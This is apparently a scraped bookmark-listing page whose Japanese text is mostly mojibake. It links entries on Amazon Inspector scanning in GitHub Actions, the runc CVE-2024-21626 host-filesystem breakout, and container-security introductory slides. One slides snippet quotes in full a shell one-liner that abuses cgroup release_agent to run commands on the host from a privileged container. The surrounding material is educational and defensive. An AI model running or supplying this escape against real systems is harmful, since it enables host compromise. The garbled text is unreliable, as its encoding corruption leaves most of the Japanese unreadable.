ããã«ã¡ã¯ãã³ã¼ãã¬ã¼ãæ¬é¨ ãµã¤ãã¼ã»ãã¥ãªãã£æ¨é²é¨ã®è¿ã§ãã 2024/6ã« Amazon Inspector ã GitHub Actions ã§ã®ã³ã³ããã¤ã¡ã¼ã¸ã¹ãã£ã³ããµãã¼ãããã¨ã®ã¢ãã¦ã³ã¹ãããã¾ãããã³ã³ããã¤ã¡ã¼ã¸ã®èå¼±æ§ã¹ãã£ã³ã«æ¢ã«Trivyãå©ç¨ãã¦ããæ¹ãå¤ãã¨æãã¾ãããå¥ã®é¸æè¢ã¨ã㦠Inspector ã«ããã¹ãã£ã³ã試ãã¦ã¿ã¾ããã ã¾ããå®ã¯ã³ã³ããã¤ã¡ã¼ã¸ã®ã¹ãã£ã³ã ãã§ã¯ãªããè¨èªããã±ã¼ã¸ã®ãã¼ã¸ã§ã³ãã¡ã¤ã«ãDockerfileãéç解æãããã¨ãå¯è½ã®ãããããããã£ã¦ã¿ã¾ããã ä»çµã¿ ã¢ã¯ã·ã§ã³ãç´è§£ã ãªãã¸ããªå ã®ãã¡ã¤ã«ãã¹ãã£ã³ããå ´å 試ãã¦ã¿ã ãµããªãã¼ã¸ã®çµæ CSVå½¢å¼ã®æ¤åºçµæ JSONå½¢å¼ã®æ¤åºçµæ Markdownå½¢å¼ã®æ¤åºçµæ èå¼±æ§ãæ¤åºãããªãã£ãå ´å ã³ã³ããã¤ã¡ã¼ã¸ãã¹ãã£ã³ããå ´å ãµããªãã¼ã¸ã®
runc working directory breakout (CVE-2024-21626) by Mohit Gupta Snyk recently identified a flaw in runc <= 1.1.11, CVE-2024-21626. This issue effectively allowed an attacker to gain filesystem access to the underlying host's OS, which could be used to gain privileged access to the host. This has an impact on orchestration based environments which use runc, such as Kubernetes. An attacker able to d
2021/06/22 Kubernetes Novice Tokyo #11 ã³ã³ãããçªãç ´ãï¼ï¼ãã³ã³ããã»ãã¥ãªãã£å ¥éåºç¤ã®åºç¤ã
å ãã¿ : https://twitter.com/_fel1x/status/1151487051986087936 d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o â Felix Wilhelm (@_fel1x) July 17, 2019 ç¹æ¨©( CAP_SYS_ADMIN )ã³ã³ãã㧠cgr
Outline Outline ä»®æ³å(virutalization) ãã¤ãã¼ãã¤ã¶/ãã¹ãåä»®æ³åã®éã ã³ã³ããã¯ã©ããªã¨ããã«ä½¿ããã¦ããã ãããï¼ ã³ã³ããã®ã»ãã¥ãªã㣠ã³ã³ããã®å®è£ ã³ã³ããã®ã¡ãªãã/ãã¡ãªãã ã¡ãªãã ãã¡ãªãã ã³ã³ããã¯ã©ããã£ã¦å®è£ ããã¦ããã®ã ãããï¼ ã³ã³ããã¯ããã»ã¹ èªä½ã³ã³ãã by Haconiwa ã§ã¯ï¼ã¾ãã³ã³ããã¯ããã»ã¹ãªã®ã§forkããã¨ããããå§ãã¾ãï¼ Namespaceãåé¢ãã¾ã cgroupãè¨å® Capabilityãè¨å® ã³ã³ããã¸ã®Attack ã³ã³ããã®ã»ãã¥ãªãã£æ©æ§ Attack Surfaces ã¹ã¤ã¹ãã¼ãºã¢ãã« AppArmor /sys/kernel/uevent_helper /proc/sysrq-trigger AppArmorã®é©ç¨ AppArmorã«ããä¿è· seccomp secco
ãªãªã¼ã¹ãé害æ å ±ãªã©ã®ãµã¼ãã¹ã®ãç¥ãã
ææ°ã®äººæ°ã¨ã³ããªã¼ã®é ä¿¡
å¦çãå®è¡ä¸ã§ã
j次ã®ããã¯ãã¼ã¯
kåã®ããã¯ãã¼ã¯
lãã¨ã§èªã
eã³ã¡ã³ãä¸è¦§ãéã
oãã¼ã¸ãéã
{{#tags}}- {{label}}
{{/tags}}